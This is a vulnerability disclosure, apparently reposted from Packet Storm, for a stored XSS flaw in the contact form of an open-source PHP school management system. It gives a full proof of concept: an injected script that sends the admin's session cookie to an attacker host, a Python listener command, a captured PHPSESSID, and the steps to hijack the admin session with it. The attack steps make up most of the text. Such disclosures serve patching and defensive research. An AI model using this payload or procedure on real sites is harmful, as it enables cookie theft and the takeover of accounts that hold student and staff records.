Share
## https://sploitus.com/exploit?id=PACKETSTORM:220054
====================================================
    School Management System PHP - Stored XSS leading to Admin Account Takeover
    ====================================================
    
    Author: Mehmet Utku KΓΆken
    Date: 2026-04-28
    CVE: N/A 
    Vendor Homepage: https://github.com/codingWithElias/school-management-system-php
    Version: 1.0.0 (commit f1ac334)
    Tested on: Windows 10 / XAMPP / PHP 8.x
    Category: Webapps
    Platform: PHP
    
    == Description ==
    
    A Stored Cross-Site Scripting (XSS) vulnerability exists in
    School Management System PHP. The contact form located at
    /req/contact.php fails to sanitize the full_name and message
    parameters before storing them in the database. When an
    administrator views the messages panel at /admin/message.php,
    the stored payload executes within the admin's browser context.
    This allows an unauthenticated attacker to steal the admin
    session cookie and perform a full account takeover.
    
    == Affected Parameters ==
    
      - full_name
      - message
    
    == Affected Files ==
    
      - /req/contact.php      (unsanitized input stored)
      - /admin/message.php    (payload execution)
    
    == Steps to Reproduce ==
    
    1. Navigate to the contact form:
       http://TARGET/school-management-system-php/
    
    2. Intercept the POST request and inject the payload
       into the full_name or message parameter:
    
       POST /school-management-system-php/req/contact.php HTTP/1.1
       Host: TARGET
       Content-Type: application/x-www-form-urlencoded
    
       email=attacker@evil.com&full_name=<script>new Image().src='http://ATTACKER:8888/?c='+document.cookie</script>&message=hello
    
    3. Start a listener on the attacker machine:
    
       python3 -m http.server 8888
    
    4. Wait for the administrator to visit the messages panel:
       http://TARGET/school-management-system-php/admin/message.php
    
    5. The attacker's listener receives the admin session cookie:
    
       GET /?c=PHPSESSID=ao7emtlus8bf87dkpumutl4v3q HTTP/1.1
    
    6. Use the captured session cookie to access the admin panel
       without credentials by setting:
    
       Cookie: PHPSESSID=ao7emtlus8bf87dkpumutl4v3q
    
       Then navigate to:
       http://TARGET/school-management-system-php/admin/
    
    == Impact ==
    
    An unauthenticated attacker can submit a malicious payload
    via the public contact form. Once the administrator views
    the messages, the attacker receives the admin PHPSESSID and
    gains full administrative access to the application including
    student records, teacher data and system configuration.
    
    
    == References ==
    
    https://owasp.org/www-community/attacks/xss/
    https://github.com/codingWithElias/school-management-system-php